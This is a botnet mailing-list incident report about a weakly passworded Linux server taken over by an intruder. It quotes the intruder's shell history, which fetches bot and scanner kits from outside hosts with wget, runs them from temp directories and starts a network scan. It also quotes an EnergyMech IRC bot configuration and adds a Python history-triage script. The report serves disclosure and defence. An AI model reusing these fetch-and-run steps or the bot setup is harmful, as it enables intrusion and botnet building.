To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
Hi,

We've found one instance of a bot from someone called Drow (the tools were
compiled but not stripped, somewhere in /home/drow ... ;))). Probably a
Spanish-speaking person.

Undernet admins should take a look down below and check their servers,
if they are listening here ..

Access was gained through a very, very weak password, and then comes the
standard procedure: download bot, ssh cracker, spam tool ...

It was a kiddie, coming from 89.123.217.233, with no cleanup and probably
a manual job ..

---- cut history ----

passwd

ps x

cd /tmp

w

ps x

cd /tmp

wget freewebs.com/staycu/stayku.tar

tar xzvf stayku.tar

cd .staycu

./linux

cat /proc/cpuinfo

cd /var/tmp/delles

cd /var/tmp

wget http://www.geocities.com/demonfire_16/delles.tar.gz

tar xzvf delles.tar.gz

cd delles

./a 200.62

nohup ./start 59 >> /dev/null &

cd /var/tmp/delles

cat vuln.txt

ps x

cd /var/tmp/delles

cat vuln.txt

ps x

cd /var/tmp/delles

cat vuln.txt
...
...
---- cut history ----

bodik

---- cut ----

# Boqdan`S EnergyMech configuration file
# v2.9.3 - Boqdan

##### Linking #####
#ENTITY        emech
#LINKPASS      abc123
#LINKPORT      49152
#LINK          hismech a1b2c3 mech.host.net 49152
#LINK          hermech abcdefg 0 0
AUTOLINK

##### Server List ####
SERVER diemen.nl.eu.undernet.org 6660
SERVER diemen.nl.eu.undernet.org 6667
SERVER diemen.nl.eu.undernet.org 6669
SERVER lelystad.nl.eu.undernet.org 6666
SERVER lelystad.nl.eu.undernet.org 6667
SERVER lelystad.nl.eu.undernet.org 6668
SERVER london2.uk.eu.undernet.org 6660
SERVER london2.uk.eu.undernet.org 6669
SERVER london2.uk.eu.undernet.org 7000
SERVER graz.at.eu.undernet.org 6660
SERVER graz.at.eu.undernet.org 6670
SERVER graz.at.eu.undernet.org 7000
SERVER helsinki.fi.eu.undernet.org 6666
SERVER helsinki.fi.eu.undernet.org 6669
SERVER helsinki.fi.eu.undernet.org 7000
SERVER montreal.qc.ca.undernet.org 6665
SERVER montreal.qc.ca.undernet.rog 6669
SERVER montreal.qc.ca.undernet.org 7000
SERVER oslo2.no.eu.undernet.org 6660
SERVER oslo2.no.eu.undernet.org 6669
SERVER oslo2.no.eu.undernet.org 7000



# SERVER  1.2.3.4         6667   ThisIsMyPassword
# SERVER 192.168.100.1    6669  moo:eu.undernet.org:6667

##### Bot 1 Configuration #####
NICK          Boqdan
USERFILE      1
CMDCHAR       -
LOGIN         gat
IRCNAME      tundd
MODES         +ix-ws
#VIRTUAL
#NOSEEN

HASONOTICE      1       # Yes for Undernet.
TOG CC          1       # We want the bot to require command character
TOG CLOAK       1       # Ignore CTCP's from non-users? Yes.
TOG SPY         1       # Tell who is executing what in the partyline.
SET OPMODES     6       # How many modes in a line? 6 on undernet...
SET BANMODES    6       # How many bans in a line? 6 on undernet...
SET CTIMEOUT    60      # Server connection timeout
SET CDELAY      30      # Delay between connection attempts

CHANNEL         #staycu.com # Channel name
TOG PUB         1       # Allow public(in-channel) commands? Yes.
TOG MASS        1       # Do mass-mode/kick/ban checks...
TOG SHIT        1       # Activate the shitlist for this channel
TOG PROT        1       # Activate protection of users
TOG ENFM        0       # Dont enforce channel modes.
SET MDL         5       # How many -o before killing the guy?
SET MKL         5       # How many kicks?
SET MBL         5       # And how many Bans?
SET MPL         1       # What to do with massmoders?
#                       0 = nothing,
#                       1 = kick the bastard,
#                       2 = kickban 'em,
#                       3 = kickban & shitlist them.
##### END BOT 1 #####

##### Bot 2 Configuration #####

NICK          Guapo
USERFILE      1
CMDCHAR       -
LOGIN         lmess
IRCNAME       mesaju
MODES         +ix-ws
#VIRtual
#NOSEEN

HASONOTICE      1       # Yes for Undernet.
TOG CC          1       # We want the bot to require command character
TOG CLOAK       1       # Ignore CTCP's from non-users? Yes.
TOG SPY         1       # Tell who is executing what in the partyline.
SET OPMODES     6       # How many modes in a line? 6 on undernet...
SET BANMODES    6       # How many bans in a line? 6 on undernet...
SET CTIMEOUT    60      # Server connection timeout
SET CDELAY      30      # Delay between connection attempts

CHANNEL         #staycu.com # Channel name
TOG PUB         1       # Allow public(in-channel) commands? Yes.
TOG MASS        1       # Do mass-mode/kick/ban checks...
TOG SHIT        1       # Activate the shitlist for this channel
TOG PROT        1       # Activate protection of users
TOG ENFM        0       # Dont enforce channel modes.
SET MDL         5       # How many -o before killing the guy?
SET MKL         5       # How many kicks?
SET MBL         5       # And how many Bans?
SET MPL         1       # What to do with massmoders?
#                       0 = nothing,
#                       1 = kick the bastard,
#                       2 = kickban 'em,
#                       3 = kickban & shitlist them.
##### END BOT 2 #####

##### Bot 3 Configuration #####

NICK          Bogdy
USERFILE      1
CMDCHAR       -
LOGIN         Lucru
IRCNAME       LeLa
MODES         +ix-ws
#VIRTUAL
#NOSEEN

HASONOTICE      1       # Yes for Undernet.
TOG CC          1       # We want the bot to require command character
TOG CLOAK       1       # Ignore CTCP's from non-users? Yes.
TOG SPY         1       # Tell who is executing what in the partyline.
SET OPMODES     6       # How many modes in a line? 6 on undernet...
SET BANMODES    6       # How many bans in a line? 6 on undernet...
SET CTIMEOUT    60      # Server connection timeout
SET CDELAY      30      # Delay between connection attempts

CHANNEL         #staycu.com # Channel name
TOG PUB         1       # Allow public(in-channel) commands? Yes.
TOG MASS        1       # Do mass-mode/kick/ban checks...
TOG SHIT        1       # Activate the shitlist for this channel
TOG PROT        1       # Activate protection of users
TOG ENFM        0       # Dont enforce channel modes.
SET MDL         5       # How many -o before killing the guy?
SET MKL         5       # How many kicks?
SET MBL         5       # And how many Bans?
SET MPL         1       # What to do with massmoders?
#                       0 = nothing,
#                       1 = kick the bastard,
#                       2 = kickban 'em,
#                       3 = kickban & shitlist them.
##### END BOT 3 #####
---- cut ----
_______________________________________________
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
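
One way to triage a recovered shell history for the sequence shown in the post (fetch into a temp directory, unpack, run from there, detach with nohup). This is an added example, not part of the original message; `triage_history`, the rule names and the sample lines (placeholder `example.invalid` hosts, documentation address prefix) are constructed for illustration.

```python
import posixpath
import re

TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")  # world-writable staging areas
FETCH = re.compile(r"^(wget|curl)\b")
UNPACK = re.compile(r"^(tar\s+\S*x|unzip\b|gunzip\b)")
LOCAL_EXEC = re.compile(r"^(nohup\s+)?\./\S+")   # binary run from the cwd
DETACHED = re.compile(r"^nohup\b.*&\s*$")        # survives logout, backgrounded

def in_temp(cwd):
    return any(cwd == d or cwd.startswith(d + "/") for d in TEMP_DIRS)

def triage_history(lines, start_dir="~"):
    """Return (line_no, rule, command) for activity staged from a temp dir."""
    cwd, findings = start_dir, []
    for no, raw in enumerate(lines, 1):
        cmd = raw.strip()
        if cmd == "cd" or cmd.startswith("cd "):
            target = cmd[2:].strip()
            # Track the working directory so relative paths can be judged.
            if not target or target.startswith("~"):
                cwd = start_dir
            else:
                cwd = posixpath.normpath(posixpath.join(cwd, target))
            continue
        if not cmd or not in_temp(cwd):
            continue
        if FETCH.match(cmd):
            findings.append((no, "fetch-into-temp", cmd))
        elif UNPACK.match(cmd):
            findings.append((no, "unpack-in-temp", cmd))
        elif LOCAL_EXEC.match(cmd):
            rule = "detached-exec-from-temp" if DETACHED.match(cmd) else "exec-from-temp"
            findings.append((no, rule, cmd))
    return findings

# Constructed sample modelled on the history in the post; hosts are placeholders.
SAMPLE = [
    "passwd", "ps x", "cd /tmp", "w",
    "wget example.invalid/kit.tar", "tar xzvf kit.tar", "cd .kit", "./linux",
    "cat /proc/cpuinfo", "cd /var/tmp",
    "wget http://example.invalid/scan.tar.gz", "tar xzvf scan.tar.gz",
    "cd scan", "./a 192.0.2", "nohup ./start 59 >> /dev/null &", "cat vuln.txt",
]

if __name__ == "__main__":
    for no, rule, cmd in triage_history(SAMPLE):
        print(f"{no:>3}  {rule:<24} {cmd}")
```

Because the working directory is tracked across `cd`, a relative `./linux` is only flagged when it was run from under a temp directory, which keeps ordinary builds in a home directory out of the results.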